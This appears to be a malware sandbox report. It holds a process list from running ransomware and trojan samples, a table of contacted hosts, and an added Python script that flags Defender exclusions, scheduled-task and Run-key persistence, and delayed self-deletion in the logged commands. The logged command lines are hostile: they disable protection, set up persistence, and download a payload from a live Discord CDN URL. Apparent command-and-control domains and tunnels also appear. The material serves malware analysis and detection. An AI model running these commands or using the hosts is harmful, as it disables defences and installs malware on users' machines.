HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe
HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe
HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe
HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe
HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe
Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2864 -ip 2864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 224
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
C:\Users\Admin\AppData\Local\Temp\MServices.exe
"C:\Users\Admin\AppData\Local\Temp\MServices.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3664 -ip 3664
C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe
"C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00462\ERROR REPORT.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 904
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\A853.bat C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Users\Admin\AppData\Local\Temp4qsldidhv1r.exe
"C:\Users\Admin\AppData\Local\Temp4qsldidhv1r.exe"
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\chromet.exe
"C:\Windows\chromet.exe"
C:\ProgramData\DLL32.exe
"C:\ProgramData\DLL32.exe"
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4776 -ip 4776
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe" "HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe" ENABLE
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 1996
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe
"C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe"
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe
Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe
Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe
C:\Windows\SysWOW64\cmd.exe
cmd /Q /C move /Y Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe C:\Users\Admin\AppData\Roaming\csrss.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/872884812841648218/1622305117.exe" "1622305117.exe" "" "" "" "" "" ""
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exe
Trojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe
Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe
Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe
C:\Windows\SysWOW64\cmd.exe
cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
C:\Users\Admin\AppData\Local\Temp\wujek.exe
"C:\Users\Admin\AppData\Local\Temp\wujek.exe"
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe
Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Mystic Entertainment" /f
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe
Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe
Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe
Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe
C:\Windows\SysWOW64\cmd.exe
cmd /C "attrib +S +H C:\Users\Admin\AppData\Roaming\csrss.exe"
C:\Windows\SYSTEM32\netsh.exe
netsh firewall add allowedprogram "C:\Windows\chromet.exe" "chromet.exe" ENABLE
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exe
Win.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exe
C:\Users\Admin\AppData\Local\Temp\magek.exe
"C:\Users\Admin\AppData\Local\Temp\magek.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +S +H C:\Users\Admin\AppData\Roaming\csrss.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exe
Win.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell -executionpolicy bypass -NonInteractive -windowstyle Hidden -file C:\Users\Admin\AppData\Local\Temp\tmpD433.tmp.ps1
C:\Users\Admin\AppData\Local\Temp\magek.exe
"C:\Users\Admin\AppData\Local\Temp\magek.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exe
Win.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe
"C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exe
Win.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exe
Win.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exe
Win.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe
Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exe
Win.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exe
Win.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exe
Win.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exe
C:\Windows\SysWOW64\cmd.exe
"cmd"
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe
Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe
Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-ece1138f7974f8945510c7802a89e9d30122621bd018d23d508dd25aa05457c2.exe
Win.Ransomware.Azvo-9979243-0-ece1138f7974f8945510c7802a89e9d30122621bd018d23d508dd25aa05457c2.exe
C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /f /tn MicrosoftOneDriveStandalone /tr "C:\Users\Admin\AppData\Roaming\windows\SecurityCryptography.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 7 /f /tn SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\windows\microsoft.foundation.diagnostics.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v COM_LOADER /d "\\.\F:\Program Files\PDF_Reader\bin\COM7.EXE"
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
C:\Users\Admin\Desktop\00462\Win.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exe
Win.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 228
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
"{path}"
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
"{path}"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1B11.tmp.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM "Hetman Partition Recovery.exe"
C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\install\active.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM "SpotifyConverter.exe"
C:\Users\Admin\AppData\Roaming\install\name.exe
"C:\Users\Admin\AppData\Roaming\install\name.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install\tactive.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Program Files (x86)\TunesKit Music Converter\SpotifyConverter.exe
"C:\Program Files (x86)\TunesKit Music Converter\SpotifyConverter.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FUyWXwXWrAlz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp44EF.tmp"
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe
"C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5708 -ip 5708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 1792
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\siude.exe
"C:\Users\Admin\AppData\Local\Temp\siude.exe"
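The process list above is raw sandbox output; the behaviours worth acting on (Defender exclusions piled onto whole profile and system directories, `schtasks` and Run-key persistence, the `choice /T 3 & Del` delayed self-delete) have to be read out of the command lines by hand. The following is an added example, not part of the report or of the sandbox vendor's tooling: a small rule-based triage pass that runs over command lines copied from this page, tags each hit with the ATT&CK sub-technique it maps to (the mapping is the editor's, not the report's) and extracts the artifact a responder would pivot on (excluded path, task name and target binary, Run value and target, deleted file). The regexes are deliberately tied to the exact forms seen here and would need widening for other wrappers.

```python
"""Rule-based triage of sandbox process command lines (added example)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Command lines copied verbatim from the process list above (the report's own data).
SAMPLE_CMDLINES = [
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'",
    (r'''"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & '''
     r'''powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & '''
     r'''powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & '''
     r'''powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit'''),
    r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit''',
    r'''"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 7 /f /tn SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\windows\microsoft.foundation.diagnostics.exe"''',
    r'''"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v COM_LOADER /d "\\.\F:\Program Files\PDF_Reader\bin\COM7.EXE"''',
    r'''"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"''',
    r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",  # benign, should yield nothing
]


@dataclass(frozen=True)
class Finding:
    technique: str   # short label for the behaviour
    attack_id: str   # ATT&CK sub-technique (editor's mapping, an assumption)
    artifact: str    # what the command touched, groups joined with " -> "
    cmdline: str     # the raw command line the finding came from


# (label, ATT&CK id, pattern); every capture group is part of the artifact.
RULES = [
    ("Defender exclusion added", "T1562.001",
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.I)),
    ("Scheduled task persistence", "T1053.005",
     re.compile(r'schtasks(?:\.exe")?\s+/create\b.*?/tn\s+"?([^\s"]+)"?.*?/tr\s+(.+?)(?:\s+&\s+exit)?\s*$', re.I)),
    ("Run-key persistence", "T1547.001",
     re.compile(r'reg(?:\.exe")?\s+ADD\s+(\S*\\Run)\b.*?/v\s+(\S+).*?/d\s+"?(.+?)"?\s*$', re.I)),
    ("Delayed self-deletion", "T1070.004",
     re.compile(r'choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*Del\s+"?(.+?)"?\s*$', re.I)),
]


def triage(cmdlines: Iterable[str]) -> List[Finding]:
    """Run every rule over every command line; one Finding per match.

    finditer matters for the Defender rule: a single cmd.exe wrapper above
    adds four exclusions in one line, and each one is its own finding.
    """
    findings: List[Finding] = []
    for cmd in cmdlines:
        for label, attack_id, pattern in RULES:
            for m in pattern.finditer(cmd):
                # Targets come quoted in several styles ('"x"', "x", x); normalise.
                parts = [g.strip(" '\"") for g in m.groups()]
                findings.append(Finding(label, attack_id, " -> ".join(parts), cmd))
    return findings


def summarize(findings: Iterable[Finding]) -> Dict[str, int]:
    """Count findings per technique, for a one-glance verdict."""
    return dict(Counter(f.technique for f in findings))


if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for f in found:
        print(f"[{f.attack_id}] {f.technique}: {f.artifact}")
    print(summarize(found))
```

The exclusion rule is the one to alert on unconditionally: `Add-MpPreference -ExclusionPath` against `%SystemRoot%`, `%UserProfile%` or `%Temp%` has no legitimate use on an endpoint and, as this sample shows, precedes the drop of the real payload.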
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.my-ip.io | udp |
| DE | 23.88.33.229:443 | api.my-ip.io | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pcfixmy-download-96.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | payments-online.xyz | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | knuzjh62.top | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| N/A | 10.10.0.135:4444 |  | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | mgoogloe.ddns.net | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| DE | 23.88.33.229:80 | api.my-ip.io | tcp |
| DE | 23.88.33.229:443 | api.my-ip.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 229.33.88.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | darkrig.ddns.net | udp |
| US | 8.8.8.8:53 | stats.pro-sw.ru | udp |
| DE | 46.4.84.214:8484 | stats.pro-sw.ru | tcp |
| US | 8.8.8.8:53 | mytestdns123.mooo.com | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| KR | 112.175.88.208:11120 |  | tcp |
| US | 3.128.107.74:12438 | 2.tcp.ngrok.io | tcp |
